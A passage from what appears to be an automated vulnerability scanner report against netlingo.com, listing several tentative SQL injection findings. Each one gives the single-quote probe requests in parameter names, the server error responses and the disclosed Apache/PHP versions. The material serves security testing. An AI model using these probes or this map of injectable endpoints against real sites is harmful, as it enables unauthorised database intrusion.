The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /subscribe.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /subscribe.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:47:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 33520

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.106. http://www.netlingo.com/tips/color-guide.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /tips/color-guide.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tips/color-guide.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /tips/color-guide.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 51436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.107. http://www.netlingo.com/tips/cyber-safety-statistics.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /tips/cyber-safety-statistics.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tips/cyber-safety-statistics.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /tips/cyber-safety-statistics.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 38312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.108. http://www.netlingo.com/tips/file-extensions.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /tips/file-extensions.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tips/file-extensions.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /tips/file-extensions.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 49178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.109. http://www.netlingo.com/tips/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /tips/index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tips/index.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /tips/index.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.110. http://www.netlingo.com/tips/resources.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /tips/resources.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tips/resources.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /tips/resources.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 73588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.111. http://www.netlingo.com/tips/webcasts.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /tips/webcasts.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tips/webcasts.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /tips/webcasts.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.112. http://www.netlingo.com/tools/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /tools/index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tools/index.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /tools/index.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 35140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.113. http://www.netlingo.com/tools/online-store.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /tools/online-store.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tools/online-store.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:52:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /tools/online-store.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:52:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 31808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.114. http://www.netlingo.com/tools/pocket-dictionary.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /tools/pocket-dictionary.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tools/pocket-dictionary.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /tools/pocket-dictionary.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.115. http://www.netlingo.com/tools/search-browse-box.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /tools/search-browse-box.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tools/search-browse-box.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /tools/search-browse-box.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 39716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.116. http://www.netlingo.com/tools/toolbar.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /tools/toolbar.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tools/toolbar.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /tools/toolbar.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 33824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.117. http://www.netlingo.com/tools/widget.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /tools/widget.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tools/widget.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:52:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /tools/widget.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:52:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 34377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.118. http://www.netlingo.com/top50/acronyms-for-parents.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /top50/acronyms-for-parents.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /top50/acronyms-for-parents.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /top50/acronyms-for-parents.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37752

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.119. http://www.netlingo.com/top50/business-text-terms.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /top50/business-text-terms.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /top50/business-text-terms.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /top50/business-text-terms.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37509

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.120. http://www.netlingo.com/top50/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /top50/index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /top50/index.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /top50/index.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.121. http://www.netlingo.com/top50/newbie-terms.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /top50/newbie-terms.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /top50/newbie-terms.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /top50/newbie-terms.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:54:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.122. http://www.netlingo.com/top50/popular-text-terms.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /top50/popular-text-terms.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /top50/popular-text-terms.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /top50/popular-text-terms.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.123. http://www.netlingo.com/unsubscribe.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /unsubscribe.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /unsubscribe.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

